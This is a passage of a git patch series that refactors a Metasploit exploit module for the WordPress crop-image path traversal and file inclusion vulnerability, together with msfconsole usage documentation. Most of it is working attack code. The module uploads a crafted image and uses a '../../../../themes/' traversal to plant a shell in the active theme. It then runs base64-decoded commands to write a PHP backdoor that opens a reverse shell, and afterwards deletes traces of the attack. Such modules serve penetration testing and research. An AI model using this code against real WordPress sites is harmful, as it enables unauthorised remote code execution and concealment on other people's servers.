   'References'      =>
     [
@@ -80,6 +80,23 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
+  def get_wpnonce2(image_id, cookie)
+    uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
+    res = send_request_cgi(
+      'method'    => 'GET',
+      'uri'       => uri,
+      'cookie'    => cookie,
+      'vars_get'  => {
+          'post'   => "#{image_id}",
+          'action' => "edit"
+        }
+    )
+    if res && res.code == 200 && res.body && res.body.length > 0
+      tmp = res.get_hidden_inputs
+      wpnonce2 = tmp[1].first[1]
+    end
+  end
+
   def get_current_theme
     uri = normalize_uri(datastore['TARGETURI'])
     res = send_request_cgi(
@@ -87,7 +104,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri'       => uri
     )
     if res && res.code == 200 && res.body && res.body.length > 0
-      res.body.scan(/\/wp-content\/themes\/(\w+)\//)[0][0]
+      res.body.scan(/\/wp-content\/themes\/(\w+)\//).flatten.first
     end
   end
 
@@ -108,30 +125,38 @@ class MetasploitModule < Msf::Exploit::Remote
           }
     )
     if res && res.code == 200 && res.body && res.body.length > 0
-      res.body.scan(/"edit":"(\w+)"/)[0][0]
+      res.body.scan(/"edit":"(\w+)"/).flatten.first
     end
   end
 
   def upload_file(tmp_filename, img_name, wp_nonce, cookie)
     path = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2019-8942", tmp_filename)
-    file = File.open(path, "r")
-    img_data = file.read
+    img_data = File.read(path)
     img_name += '.jpg'
-    data = Rex::MIME::Message.new
-    data.add_part(img_name, nil, nil, 'form-data; name="name"')
-    data.add_part('upload-attachment', nil, nil, 'form-data; name="action"')
-    data.add_part(wp_nonce, nil, nil, 'form-data; name="_wpnonce"')
-    data.add_part(img_data, 'image/jpeg', nil, "form-data; name=\"async-upload\"; filename=\"#{img_name}\"")
-    post_data = data.to_s
+
+    boundary = "#{rand_text_alphanumeric(rand(10) + 5)}"
+    post_data  = "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"name\"\r\n"
+    post_data << "\r\n#{img_name}\r\n"
+    post_data << "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"action\"\r\n"
+    post_data << "\r\nupload-attachment\r\n"
+    post_data << "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"_wpnonce\"\r\n"
+    post_data << "\r\n#{wp_nonce}\r\n"
+    post_data << "--#{boundary}\r\n"
+    post_data << "Content-Disposition: form-data; name=\"async-upload\"; filename=\"#{img_name}\"\r\n"
+    post_data << "Content-Type: image/jpeg\r\n"
+    post_data << "\r\n#{img_data}\r\n"
+    post_data << "--#{boundary}--\r\n"
     print_status("Uploading payload")
     upload_uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'async-upload.php')
 
       res = send_request_cgi(
         'method'   => 'POST',
         'uri'      => upload_uri,
-        'ctype'    => "multipart/form-data; boundary=#{data.bound}",
-        'data'     => post_data,    #FIXME: during upload process image isn't uploaded as intended (binary has changed).
-                                    # In case of GD library the image structure is destroyed resulting into an impossibility to crop.
+        'ctype'    => "multipart/form-data; boundary=#{boundary}",
+        'data'     => post_data,
         'cookie'   => cookie
       )
       if res && res.code == 200 && res.body && res.body.length > 0
@@ -144,22 +169,6 @@ class MetasploitModule < Msf::Exploit::Remote
       end
   end
 
-
-  def check_library(filename, current_date, cookie)
-    uri = normalize_uri(datastore['TARGETURI'], 'wp-content', 'uploads', current_date, 'cropped-'+filename)
-    res = send_request_cgi(
-      'method'    => 'GET',
-      'uri'       => uri,
-      'cookie' => cookie
-    )
-    if res && res.code == 200 && res.body && res.body.length > 0
-      if res.body.include?("gd-jpeg")
-        false
-      end
-      true
-    end
-  end
-
   def image_editor(img_name, ajax_nonce, image_id, cookie)
     uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
     res = send_request_cgi(
@@ -177,35 +186,22 @@ class MetasploitModule < Msf::Exploit::Remote
           }
     )
     if res && res.code == 200 && res.body && res.body.length > 0
-      filename = res.body.scan(/(#{img_name}-\S+)-/)[0][0]
+      filename = res.body.scan(/(#{img_name}-\S+)-/).flatten.first
       filename += '.jpg'
     end
   end
 
-  def get_wpnonce2(image_id, cookie)
-    uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php?post='+image_id.to_s+'&action=edit')
-    res = send_request_cgi(
-      'method'    => 'GET',
-      'uri'       => uri,
-      'cookie' => cookie
-    )
-    if res && res.code == 200 && res.body && res.body.length > 0
-      tmp = res.get_hidden_inputs
-      _wpnonce = tmp[1].first[1]
-    end
-  end
-
-  def change_path(_wpnonce, image_id, filename, current_date, path, cookie)
+  def change_path(wpnonce2, image_id, filename, current_date, path, cookie)
     uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
     res = send_request_cgi(
         'method'   => 'POST',
         'uri'      => uri,
         'cookie' => cookie,
         'vars_post'  => {
-        '_wpnonce' => _wpnonce,
+        '_wpnonce' => wpnonce2,
       'action' => 'editpost',
       'post_ID' => image_id,
-      'meta_input[_wp_attached_file]' => current_date+filename+path
+      'meta_input[_wp_attached_file]' => "#{current_date}#{filename}#{path}"
           }
       )
   end
@@ -238,19 +234,20 @@ class MetasploitModule < Msf::Exploit::Remote
         'cookie' => cookie
     )
     if res && res.code == 200 && res.body && res.body.length > 0
-      _wpnonce = res.body.scan(/name="_wpnonce" value="(\w+)"/)[0][0]
-      post_id = res.body.scan(/"post":{"id":(\w+),/)[0][0]
+      wpnonce2 = res.body.scan(/name="_wpnonce" value="(\w+)"/).flatten.first
+      post_id = res.body.scan(/"post":{"id":(\w+),/).flatten.first
+      post_title = Rex::Text.rand_text_alpha(10)
       uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
       res = send_request_cgi(
         'method'   => 'POST',
         'uri'      => uri,
         'cookie' => cookie,
         'vars_post'  => {
-          '_wpnonce'=>_wpnonce,
+          '_wpnonce'=> wpnonce2,
           'action' => 'editpost',
           'post_ID' => post_id,
-          'post_title' => 'wut',
-          'post_name' => 'wut',
+          'post_title' => post_title,
+          'post_name' => post_title,
           'meta_input[_wp_page_template]' => "cropped-#{shell_name}.jpg"
           }
       )
@@ -260,6 +257,81 @@ class MetasploitModule < Msf::Exploit::Remote
     end
   end
 
+  def wp_cleanup(shell_name, post_id, cookie)
+    uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
+    res = send_request_cgi(
+      'method'    => 'POST',
+      'uri'       => uri,
+      'cookie'    => cookie,
+      'vars_post'  => {
+          'action' => "query-attachments"
+        }
+    )
+    if res && res.code == 200 && res.body && res.body.length > 0
+      infos = res.body.scan(/id":(\d+),.*filename":"cropped-#{shell_name}".*?"delete":"(\w+)".*"id":(\d+),.*filename":"cropped-x".*?"delete":"(\w+)".*"id":(\d+),.*filename":"#{shell_name}".*?"delete":"(\w+)"/).flatten
+      id1, id2, id3 = infos[0], infos[2], infos[4]
+      delete_nonce1, delete_nonce2, delete_nonce3 = infos[1], infos[3], infos[5]
+      for i in (0...6).step(2)
+        res = send_request_cgi(
+        'method'    => 'POST',
+        'uri'       => uri,
+        'cookie'    => cookie,
+        'vars_post'  => {
+            'action' => "delete-post",
+            'id'     => "#{infos[i]}",
+            '_wpnonce' => "#{infos[i+1]}"
+          }
+        )
+      end
+    end
+
+    uri1 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'edit.php')
+    res = send_request_cgi(
+      'method'    => 'GET',
+      'uri'       => uri1,
+      'cookie'    => cookie
+    )
+    if res && res.code == 200 && res.body && res.body.length > 0
+      post_nonce = res.body.scan(/post=#{post_id}&amp;action=trash&amp;_wpnonce=(\w+)/).flatten.first
+      uri2 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
+      res = send_request_cgi(
+        'method'    => 'GET',
+        'uri'       => uri2,
+        'cookie'    => cookie,
+        'vars_get'  => {
+          'post'     => "#{post_id}",
+          'action'   => 'trash',
+          '_wpnonce' => "#{post_nonce}"
+        }
+      )
+      if res && res.code == 302
+        res = send_request_cgi(
+        'method'    => 'GET',
+        'uri'       => uri1,
+        'cookie'    => cookie,
+        'vars_get'  => {
+          'post_status' => "trash",
+          'post_type'   => 'post',
+          '_wpnonce' => "#{post_nonce}"
+          }
+        )
+        if res && res.code == 200 && res.body && res.body.length > 0
+          nonce = res.body.scan(/post=#{post_id}&amp;action=delete&amp;_wpnonce=(\w+)/).flatten.first
+          res = send_request_cgi(
+          'method'    => 'GET',
+          'uri'       => uri2,
+          'cookie'    => cookie,
+          'vars_get'  => {
+            'post'     => "#{post_id}",
+            'action'   => 'delete',
+            '_wpnonce' => "#{nonce}"
+            }
+          )
+        end
+      end
+    end
+  end
+
   def exploit
     fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?
 
@@ -270,134 +342,74 @@ class MetasploitModule < Msf::Exploit::Remote
     store_valid_credential(user: username, private: password, proof: cookie)
 
     print_status("Preparing payload...")
-    img_name = Rex::Text.rand_text_alpha(10)
     @current_theme = get_current_theme
     wp_nonce = get_wpnonce(cookie)
+    tmp_filename = "evilshell.jpg"
+    @current_date = Time.now.strftime("%Y/%m/")
 
-    print_status("Checking crop library")
-    tmp_filename = "evil.jpg"
+    img_name = Rex::Text.rand_text_alpha(10)
     @filename1, image_id, update_nonce = upload_file(tmp_filename, img_name, wp_nonce, cookie)
     ajax_nonce = get_ajaxnonce(cookie)
-    @current_date = Time.now.strftime("%Y/%m/")
-    #Check current library
-    use_imagick = true
-    crop_image(image_id, ajax_nonce, cookie)
-    use_imagick = check_library(@filename1, @current_date, cookie)
 
-    if use_imagick 
-      #IMAGICK exploit
-      img_name = Rex::Text.rand_text_alpha(10)
-      @filename2, image_id, update_nonce = upload_file(tmp_filename, img_name, wp_nonce, cookie)
-      ajax_nonce = get_ajaxnonce(cookie)
-      @filename2 = image_editor(img_name, ajax_nonce, image_id, cookie)
+    @filename1 = image_editor(img_name, ajax_nonce, image_id, cookie)
+    wpnonce2 =  get_wpnonce2(image_id, cookie)
 
-      _wpnonce =  get_wpnonce2(image_id, cookie)
-      change_path(_wpnonce, image_id, @filename2, @current_date, '?/x', cookie)
-      crop_image(image_id , ajax_nonce, cookie)
-      @shell_name = Rex::Text.rand_text_alpha(10)
-      change_path(_wpnonce, image_id, @filename2, @current_date, "?/../../../../themes/#{@current_theme}/#{@shell_name}", cookie)
-      crop_image(image_id , ajax_nonce, cookie)
-      print_status("Including into theme")
-      post_id = include_theme(@shell_name, cookie)
-      uri = normalize_uri(datastore['TARGETURI'])
-      #Test if base64 is on target
-      test_string = 'YmFzZTY0c3BvdHRlZAo='
-      res = send_request_cgi(
-        'method'   => 'GET',
-        'uri'      => uri,
-        'cookie' => cookie,
-        'vars_get' => {
-          'p' => "#{post_id}",
-          '0' => "echo #{test_string} | base64 -d"
-        }
-      )
-      if res && res.code == 200 && res.body && res.body.length > 0
-        if res.body.include?("base64spotted")
-          #Execute payload with base64 decode
-          @backdoor = Rex::Text.rand_text_alpha(10)
-          encoded = Rex::Text.encode_base64(payload.encoded)
+    change_path(wpnonce2, image_id, @filename1, @current_date, '?/x', cookie)
+    crop_image(image_id , ajax_nonce, cookie)
+
+    @shell_name = Rex::Text.rand_text_alpha(10)
+    change_path(wpnonce2, image_id, @filename1, @current_date, "?/../../../../themes/#{@current_theme}/#{@shell_name}", cookie)
+    crop_image(image_id , ajax_nonce, cookie)
+
+    print_status("Including into theme")
+    post_id = include_theme(@shell_name, cookie)
+    uri = normalize_uri(datastore['TARGETURI'])
+    #Test if base64 is on target
+    test_string = 'YmFzZTY0c3BvdHRlZAo='
+    res = send_request_cgi(
+      'method'   => 'GET',
+      'uri'      => uri,
+      'cookie' => cookie,
+      'vars_get' => {
+        'p' => "#{post_id}",
+        '0' => "echo #{test_string} | base64 -d"
+      }
+    )
+    if res && res.code == 200 && res.body && res.body.length > 0
+      if res.body.include?("base64spotted")
+        #Execute payload with base64 decode
+        @backdoor = Rex::Text.rand_text_alpha(10)
+        encoded = Rex::Text.encode_base64(payload.encoded)
+        res = send_request_cgi(
+          'method'   => 'GET',
+          'uri'      => uri,
+          'cookie' => cookie,
+          'vars_get' => {
+            'p' => "#{post_id}",
+            '0' => "echo #{encoded} | base64 -d > #{@backdoor}.php"
+          }
+        )
+        if res && res.code == 200 && res.body && res.body.length > 0
+          uri = normalize_uri(datastore['TARGETURI'], "#{@backdoor}.php")
           res = send_request_cgi(
             'method'   => 'GET',
             'uri'      => uri,
-            'cookie' => cookie,
-            'vars_get' => {
-              'p' => "#{post_id}",
-              '0' => "echo #{encoded} | base64 -d > #{@backdoor}.php"
-            }
-          )
-          if res && res.code == 200 && res.body && res.body.length > 0
-            uri = normalize_uri(datastore['TARGETURI'], "#{@backdoor}.php")
-            res = send_request_cgi(
-              'method'   => 'GET',
-              'uri'      => uri,
-              'cookie' => cookie
-              )
-          end
-        else
-          print_status("Can't find base64 decode on target.")
-        end
-      end
-    else
-      #GD stuff
-      print_status('GD library')
-      tmp_filename = "evilshell.jpg"
-      img_name = Rex::Text.rand_text_alpha(10)
-      @filename2, image_id, update_nonce = upload_file(tmp_filename, img_name, wp_nonce, cookie)
-      ajax_nonce = get_ajaxnonce(cookie)
-      _wpnonce =  get_wpnonce2(image_id, cookie)
-      @shell_name = Rex::Text.rand_text_alpha(10)
-      change_path(_wpnonce, image_id, @filename2, @current_date, "?/../../../../themes/#{@current_theme}/#{@shell_name}", cookie)
-      crop_image(image_id , ajax_nonce, cookie)
-      print_status("Including into theme")
-      post_id = include_theme(@shell_name, cookie)
-      uri = normalize_uri(datastore['TARGETURI'])
-      #Test if base64 is on target
-      test_string = 'YmFzZTY0c3BvdHRlZAo='
-      res = send_request_cgi(
-        'method'   => 'GET',
-        'uri'      => uri,
-        'cookie' => cookie,
-        'vars_get' => {
-          'p' => "#{post_id}",
-          '0' => "echo #{test_string} | base64 -d"
-        }
-      )
-      if res && res.code == 200 && res.body && res.body.length > 0
-        if res.body.include?("base64spotted")
-          #Execute payload with base64 decode
-          @backdoor = Rex::Text.rand_text_alpha(10)
-          encoded = Rex::Text.encode_base64(payload.encoded)
-          res = send_request_cgi(
-            'method'   => 'GET',
-            'uri'      => uri,
-            'cookie' => cookie,
-            'vars_get' => {
-              'p' => "#{post_id}",
-              '0' => "echo #{encoded} | base64 -d > #{@backdoor}.php"
-            }
-          )
-          if res && res.code == 200 && res.body && res.body.length > 0
-            uri = normalize_uri(datastore['TARGETURI'], "#{@backdoor}.php")
-            res = send_request_cgi(
-              'method'   => 'GET',
-              'uri'      => uri,
-              'cookie' => cookie
-              )
-          end
-        else
-          print_status("Can't find base64 decode on target.")
+            'cookie' => cookie
+            )
         end
+      else
+        print_status("Can't find base64 decode on target.")
       end
     end
+    wp_cleanup(@shell_name, post_id, cookie)
   end
 
   def on_new_session(client)
-    #sleep 1
     client.shell_command_token("rm wp-content/uploads/#{@current_date}#{@filename1[0...10]}*")
     client.shell_command_token("rm wp-content/uploads/#{@current_date}cropped-#{@filename1[0...10]}*")
-    client.shell_command_token("rm -r wp-content/uploads/#{@current_date}#{@filename2[0...10]}*")
+    client.shell_command_token("rm -r wp-content/uploads/#{@current_date}#{@filename1[0...10]}*")
     client.shell_command_token("rm wp-content/themes/#{@current_theme}/cropped-#{@shell_name}.jpg")
-    #client.shell_command_token("rm #{@backdoor}.php")
+    client.shell_command_token("rm #{@backdoor}.php")
   end
 
 end

From 2ccd753ff55afec393124a5bd7c77c15a8d16f39 Mon Sep 17 00:00:00 2001
From: Shelby Pace <shelby_pace@rapid7.com>
Date: Mon, 25 Mar 2019 13:58:58 -0500
Subject: [PATCH 05/16] modified scenario output for path

---
 .../modules/exploit/multi/http/wp_crop_rce.md        | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/documentation/modules/exploit/multi/http/wp_crop_rce.md b/documentation/modules/exploit/multi/http/wp_crop_rce.md
index 2eec8e1a26..545eabe3f4 100644
--- a/documentation/modules/exploit/multi/http/wp_crop_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_crop_rce.md
@@ -16,7 +16,7 @@ More details can be found on [RIPS Technology Blog](https://blog.ripstech.com/20
 
 Confirm that functionality works:
 1. Start `msfconsole`
-2. `use exploit/unix/webapp/wp_crop_rce`
+2. `use exploit/multi/http/wp_crop_rce`
 3. Set the `RHOST`
 4. Set `USERNAME` and `PASSWORD`
 4. Set `LHOST` and `LPORT`
@@ -29,14 +29,14 @@ Confirm that functionality works:
 ### Ubuntu 18.04 running WordPress 4.9.8
 
 ```
-msf5 > use exploit/unix/webapp/wp_crop_rce
-msf5 exploit(unix/webapp/wp_crop_rce) > set rhosts 127.0.0.1
+msf5 > use exploit/multi/http/wp_crop_rce
+msf5 exploit(multi/http/wp_crop_rce) > set rhosts 127.0.0.1
 rhosts => 127.0.0.1
-msf5 exploit(unix/webapp/wp_crop_rce) > set username author
+msf5 exploit(multi/http/wp_crop_rce) > set username author
 username => author
-msf5 exploit(unix/webapp/wp_crop_rce) > set password author
+msf5 exploit(multi/http/wp_crop_rce) > set password author
 password => author
-msf5 exploit(unix/webapp/wp_crop_rce) > run
+msf5 exploit(multi/http/wp_crop_rce) > run
 
 [*] Started reverse TCP handler on 127.0.0.1:4444 
 [*] Authenticating with WordPress using author:author...

From 59f5c291c90825426498ba870eb161d66bfa299e Mon Sep 17 00:00:00 2001
From: Shelby Pace <shelby_pace@rapid7.com>
Date: Mon, 25 Mar 2019 14:25:09 -0500
Subject: [PATCH 06/16] removed spare spaces and modified some indentation

---
 modules/exploits/multi/http/wp_crop_rce.rb | 201 ++++++++++-----------
 1 file changed, 99 insertions(+), 102 deletions(-)

diff --git a/modules/exploits/multi/http/wp_crop_rce.rb b/modules/exploits/multi/http/wp_crop_rce.rb
index 6405942862..7a638ce3b6 100644
--- a/modules/exploits/multi/http/wp_crop_rce.rb
+++ b/modules/exploits/multi/http/wp_crop_rce.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'rex'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -16,10 +14,10 @@ class MetasploitModule < Msf::Exploit::Remote
     info,
     'Name'            => 'WordPress Crop-image Shell Upload',
     'Description'     => %q{
-        This module exploit a path traversal and a local file inclusion
-        vulnerability on WordPress versions 4.9.8 and less.
-        The crop-image function allow an user, with at least author privileges,
-        to resize an image an perform a path traversal by changing the _wp_attached_file
+        This module exploits a path traversal and a local file inclusion
+        vulnerability on WordPress versions 5.0.0 and <= 4.9.8.
+        The crop-image function allows a user, with at least author privileges,
+        to resize an image and perform a path traversal by changing the _wp_attached_file
         reference during the upload. The second part of the exploit will include
         this image in the current theme by changing the _wp_page_template attribute
         when creating a post.
@@ -45,8 +43,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
   register_options(
     [
-    OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
-    OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
+      OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
+      OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
     ])
   end
 
@@ -61,11 +59,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def username
-  datastore['USERNAME']
+    datastore['USERNAME']
   end
 
   def password
-  datastore['PASSWORD']
+    datastore['PASSWORD']
   end
 
   def get_wpnonce(cookie)
@@ -87,9 +85,9 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri'       => uri,
       'cookie'    => cookie,
       'vars_get'  => {
-          'post'   => "#{image_id}",
-          'action' => "edit"
-        }
+        'post'   => "#{image_id}",
+        'action' => "edit"
+      }
     )
     if res && res.code == 200 && res.body && res.body.length > 0
       tmp = res.get_hidden_inputs
@@ -115,14 +113,14 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri'       => uri,
       'cookie' => cookie,
       'vars_post'  => {
-      'action' => 'query-attachments',
-      'post_id' => '0',
-      'query[item]' => '43',
-      'query[orderby]' => 'date',
-      'query[order]' => 'DESC',
-      'query[posts_per_page]' => '40',
-      'query[paged]' => '1'
-          }
+        'action' => 'query-attachments',
+        'post_id' => '0',
+        'query[item]' => '43',
+        'query[orderby]' => 'date',
+        'query[order]' => 'DESC',
+        'query[posts_per_page]' => '40',
+        'query[paged]' => '1'
+      }
     )
     if res && res.code == 200 && res.body && res.body.length > 0
       res.body.scan(/"edit":"(\w+)"/).flatten.first
@@ -135,7 +133,7 @@ class MetasploitModule < Msf::Exploit::Remote
     img_name += '.jpg'
 
     boundary = "#{rand_text_alphanumeric(rand(10) + 5)}"
-    post_data  = "--#{boundary}\r\n"
+    post_data = "--#{boundary}\r\n"
     post_data << "Content-Disposition: form-data; name=\"name\"\r\n"
     post_data << "\r\n#{img_name}\r\n"
     post_data << "--#{boundary}\r\n"
@@ -152,21 +150,21 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Uploading payload")
     upload_uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'async-upload.php')
 
-      res = send_request_cgi(
-        'method'   => 'POST',
-        'uri'      => upload_uri,
-        'ctype'    => "multipart/form-data; boundary=#{boundary}",
-        'data'     => post_data,
-        'cookie'   => cookie
-      )
-      if res && res.code == 200 && res.body && res.body.length > 0
-        print_good("Image uploaded")
-        res = JSON.parse(res.body)
-        image_id = res["data"]["id"]
-        update_nonce = res["data"]["nonces"]["update"]
-        filename = res["data"]["filename"]
-        return filename, image_id, update_nonce
-      end
+    res = send_request_cgi(
+      'method'   => 'POST',
+      'uri'      => upload_uri,
+      'ctype'    => "multipart/form-data; boundary=#{boundary}",
+      'data'     => post_data,
+      'cookie'   => cookie
+    )
+    if res && res.code == 200 && res.body && res.body.length > 0
+      print_good("Image uploaded")
+      res = JSON.parse(res.body)
+      image_id = res["data"]["id"]
+      update_nonce = res["data"]["nonces"]["update"]
+      filename = res["data"]["filename"]
+      return filename, image_id, update_nonce
+    end
   end
 
   def image_editor(img_name, ajax_nonce, image_id, cookie)
@@ -176,14 +174,14 @@ class MetasploitModule < Msf::Exploit::Remote
       'uri'       => uri,
       'cookie' => cookie,
       'vars_post'  => {
-      'action' => 'image-editor',
-      '_ajax_nonce' => ajax_nonce,
-      'postid' => image_id,
-      'history' => '[{"c":{"x":0,"y":0,"w":400,"h":300}}]',
-      'target' => 'all',
-      'context' => '',
-      'do' => 'save'
-          }
+        'action' => 'image-editor',
+        '_ajax_nonce' => ajax_nonce,
+        'postid' => image_id,
+        'history' => '[{"c":{"x":0,"y":0,"w":400,"h":300}}]',
+        'target' => 'all',
+        'context' => '',
+        'do' => 'save'
+      }
     )
     if res && res.code == 200 && res.body && res.body.length > 0
       filename = res.body.scan(/(#{img_name}-\S+)-/).flatten.first
@@ -194,44 +192,44 @@ class MetasploitModule < Msf::Exploit::Remote
   def change_path(wpnonce2, image_id, filename, current_date, path, cookie)
     uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')
     res = send_request_cgi(
-        'method'   => 'POST',
-        'uri'      => uri,
-        'cookie' => cookie,
-        'vars_post'  => {
+      'method'   => 'POST',
+      'uri'      => uri,
+      'cookie' => cookie,
+      'vars_post'  => {
         '_wpnonce' => wpnonce2,
-      'action' => 'editpost',
-      'post_ID' => image_id,
-      'meta_input[_wp_attached_file]' => "#{current_date}#{filename}#{path}"
-          }
-      )
+        'action' => 'editpost',
+        'post_ID' => image_id,
+        'meta_input[_wp_attached_file]' => "#{current_date}#{filename}#{path}"
+      }
+    )
   end
 
-  def crop_image(image_id , ajax_nonce, cookie)
+  def crop_image(image_id, ajax_nonce, cookie)
     uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')
     res = send_request_cgi(
-        'method'   => 'POST',
-        'uri'      => uri,
-        'cookie' => cookie,
-        'vars_post'  => {
-      'action' => 'crop-image',
-      '_ajax_nonce' => ajax_nonce,
-      'id' => image_id,
-      'cropDetails[x1]' => 0,
-      'cropDetails[y1]' => 0,
-      'cropDetails[width]' => 400,
-      'cropDetails[height]' => 300,
-      'cropDetails[dst_width]' => 400,
-      'cropDetails[dst_height]' => 300
-        }
+      'method'   => 'POST',
+      'uri'      => uri,
+      'cookie' => cookie,
+      'vars_post'  => {
+        'action' => 'crop-image',
+        '_ajax_nonce' => ajax_nonce,
+        'id' => image_id,
+        'cropDetails[x1]' => 0,
+        'cropDetails[y1]' => 0,
+        'cropDetails[width]' => 400,
+        'cropDetails[height]' => 300,
+        'cropDetails[dst_width]' => 400,
+        'cropDetails[dst_height]' => 300
+      }
     )
   end
 
   def include_theme(shell_name, cookie)
     uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post-new.php')
     res = send_request_cgi(
-        'method'   => 'POST',
-        'uri'      => uri,
-        'cookie' => cookie
+      'method'   => 'POST',
+      'uri'      => uri,
+      'cookie' => cookie
     )
     if res && res.code == 200 && res.body && res.body.length > 0
       wpnonce2 = res.body.scan(/name="_wpnonce" value="(\w+)"/).flatten.first
@@ -249,7 +247,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'post_title' => post_title,
           'post_name' => post_title,
           'meta_input[_wp_page_template]' => "cropped-#{shell_name}.jpg"
-          }
+        }
       )
       if res && res.code == 302
         post_id
@@ -265,7 +263,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'cookie'    => cookie,
       'vars_post'  => {
           'action' => "query-attachments"
-        }
+      }
     )
     if res && res.code == 200 && res.body && res.body.length > 0
       infos = res.body.scan(/id":(\d+),.*filename":"cropped-#{shell_name}".*?"delete":"(\w+)".*"id":(\d+),.*filename":"cropped-x".*?"delete":"(\w+)".*"id":(\d+),.*filename":"#{shell_name}".*?"delete":"(\w+)"/).flatten
@@ -273,13 +271,13 @@ class MetasploitModule < Msf::Exploit::Remote
       delete_nonce1, delete_nonce2, delete_nonce3 = infos[1], infos[3], infos[5]
       for i in (0...6).step(2)
         res = send_request_cgi(
-        'method'    => 'POST',
-        'uri'       => uri,
-        'cookie'    => cookie,
-        'vars_post'  => {
-            'action' => "delete-post",
-            'id'     => "#{infos[i]}",
-            '_wpnonce' => "#{infos[i+1]}"
+          'method'    => 'POST',
+          'uri'       => uri,
+          'cookie'    => cookie,
+          'vars_post'  => {
+              'action' => "delete-post",
+              'id'     => "#{infos[i]}",
+              '_wpnonce' => "#{infos[i+1]}"
           }
         )
       end
@@ -306,25 +304,25 @@ class MetasploitModule < Msf::Exploit::Remote
       )
       if res && res.code == 302
         res = send_request_cgi(
-        'method'    => 'GET',
-        'uri'       => uri1,
-        'cookie'    => cookie,
-        'vars_get'  => {
-          'post_status' => "trash",
-          'post_type'   => 'post',
-          '_wpnonce' => "#{post_nonce}"
+          'method'    => 'GET',
+          'uri'       => uri1,
+          'cookie'    => cookie,
+          'vars_get'  => {
+            'post_status' => "trash",
+            'post_type'   => 'post',
+            '_wpnonce' => "#{post_nonce}"
           }
         )
         if res && res.code == 200 && res.body && res.body.length > 0
           nonce = res.body.scan(/post=#{post_id}&amp;action=delete&amp;_wpnonce=(\w+)/).flatten.first
           res = send_request_cgi(
-          'method'    => 'GET',
-          'uri'       => uri2,
-          'cookie'    => cookie,
-          'vars_get'  => {
-            'post'     => "#{post_id}",
-            'action'   => 'delete',
-            '_wpnonce' => "#{nonce}"
+            'method'    => 'GET',
+            'uri'       => uri2,
+            'cookie'    => cookie,
+            'vars_get'  => {
+              'post'     => "#{post_id}",
+              'action'   => 'delete',
+              '_wpnonce' => "#{nonce}"
             }
           )
         end
@@ -352,19 +350,19 @@ class MetasploitModule < Msf::Exploit::Remote
     ajax_nonce = get_ajaxnonce(cookie)
 
     @filename1 = image_editor(img_name, ajax_nonce, image_id, cookie)
-    wpnonce2 =  get_wpnonce2(image_id, cookie)
+    wpnonce2 = get_wpnonce2(image_id, cookie)
 
     change_path(wpnonce2, image_id, @filename1, @current_date, '?/x', cookie)
-    crop_image(image_id , ajax_nonce, cookie)
+    crop_image(image_id, ajax_nonce, cookie)
 
     @shell_name = Rex::Text.rand_text_alpha(10)
     change_path(wpnonce2, image_id, @filename1, @current_date, "?/../../../../themes/#{@current_theme}/#{@shell_name}", cookie)
-    crop_image(image_id , ajax_nonce, cookie)
+    crop_image(image_id, ajax_nonce, cookie)
 
     print_status("Including into theme")
     post_id = include_theme(@shell_name, cookie)
     uri = normalize_uri(datastore['TARGETURI'])
-    #Test if base64 is on target
+    # Test if base64 is on target
     test_string = 'YmFzZTY0c3BvdHRlZAo='
     res = send_request_cgi(
       'method'   => 'GET',
@@ -377,7 +375,7 @@ class MetasploitModule < Msf::Exploit::Remote
     )
     if res && res.code == 200 && res.body && res.body.length > 0
       if res.body.include?("base64spotted")
-        #Execute payload with base64 decode
+        # Execute payload with base64 decode
         @backdoor = Rex::Text.rand_text_alpha(10)
         encoded = Rex::Text.encode_base64(payload.encoded)
         res = send_request_cgi(
@@ -395,7 +393,7 @@ class MetasploitModule < Msf::Exploit::Remote
             'method'   => 'GET',
             'uri'      => uri,
             'cookie' => cookie
-            )
+          )
         end
       else
         print_status("Can't find base64 decode on target.")
@@ -411,5 +409,4 @@ class MetasploitModule < Msf::Exploit::Remote
     client.shell_command_token("rm wp-content/themes/#{@current_theme}/cropped-#{@shell_name}.jpg")
     client.shell_command_token("rm #{@backdoor}.php")
   end
-
 end

From 3a8b09f08ee26b96c03f0a3015b5c9ea0b113c32 Mon Sep 17 00:00:00 2001
From: Shelby Pace <shelby_pace@rapid7.com>
Date: Mon, 25 Mar 2019 14:48:19 -0500
Subject: [PATCH 07/16] added checks on scan method

---
 modules/exploits/multi/http/wp_crop_rce.rb | 35 +++++++++++++++-------
 1 file changed, 25 insertions(+), 10 deletions(-)

